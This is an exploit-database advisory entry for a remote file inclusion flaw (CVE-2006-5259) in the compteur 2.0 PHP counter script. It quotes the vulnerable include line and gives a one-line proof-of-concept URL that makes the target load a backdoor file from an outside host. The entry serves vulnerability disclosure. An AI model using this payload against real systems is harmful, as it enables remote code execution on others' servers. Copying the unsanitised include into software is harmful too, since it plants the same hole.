compteur 2.0 - 'param_editor.php' Remote File Inclusion
Author: DarkFig
type: webapps
platform: php
port:
date_added: 2006-10-09
date_updated:
verified: 1
codes: OSVDB-29617;CVE-2006-5259
tags:
aliases:
screenshot_url:
application_url:
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#
# Affected.scr: compteur_v2
# Download....: http://zebigbrozer.free.fr/compt_new/compteur_v2.zip
# Poc.........: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?
# Vuln.code...: Line 9 , include($_GET["folder"]."param.php")
# milw0rm.com [2006-10-10]